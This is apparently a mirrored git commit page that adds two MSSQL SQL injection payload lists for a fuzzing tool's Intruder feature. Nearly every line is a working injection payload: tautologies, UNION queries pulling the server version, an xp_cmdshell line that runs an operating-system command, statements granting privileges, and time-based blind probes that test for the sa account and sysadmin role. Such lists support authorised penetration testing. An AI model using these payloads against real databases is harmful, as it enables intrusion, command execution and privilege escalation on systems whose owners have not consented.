mirror of
https://github.com/payloadbox/sql-injection-payload-list.git
synced 2025-12-29 16:15:05 +00:00
Intruder Payloads
Add Intruder Payloads
This commit is contained in:
12
Intruder/detect/MSSQL/MSSQL.txt
Normal file
12
Intruder/detect/MSSQL/MSSQL.txt
Normal file
@@ -0,0 +1,12 @@
|
||||
; --
|
||||
'; --
|
||||
'); --
|
||||
'; exec master..xp_cmdshell 'ping 10.10.1.2'--
|
||||
' grant connect to name; grant resource to name; --
|
||||
' or 1=1 --
|
||||
' union (select @@version) --
|
||||
' union (select NULL, (select @@version)) --
|
||||
' union (select NULL, NULL, (select @@version)) --
|
||||
' union (select NULL, NULL, NULL, (select @@version)) --
|
||||
' union (select NULL, NULL, NULL, NULL, (select @@version)) --
|
||||
' union (select NULL, NULL, NULL, NULL, NULL, (select @@version)) --
|
||||
8
Intruder/detect/MSSQL/MSSQL_blind.txt
Normal file
8
Intruder/detect/MSSQL/MSSQL_blind.txt
Normal file
@@ -0,0 +1,8 @@
|
||||
'; if not(substring((select @@version),25,1) <> 0) waitfor delay '0:0:2' --
|
||||
'; if not(substring((select @@version),25,1) <> 5) waitfor delay '0:0:2' --
|
||||
'; if not(substring((select @@version),25,1) <> 8) waitfor delay '0:0:2' --
|
||||
'; if not(substring((select @@version),24,1) <> 1) waitfor delay '0:0:2' --
|
||||
'; if not(select system_user) <> 'sa' waitfor delay '0:0:2' --
|
||||
'; if is_srvrolemember('sysadmin') > 0 waitfor delay '0:0:2' --
|
||||
'; if not((select serverproperty('isintegratedsecurityonly')) <> 1) waitfor delay '0:0:2' --
|
||||
'; if not((select serverproperty('isintegratedsecurityonly')) <> 0) waitfor delay '0:0:2' --
|
||||
Reference in New Issue
Block a user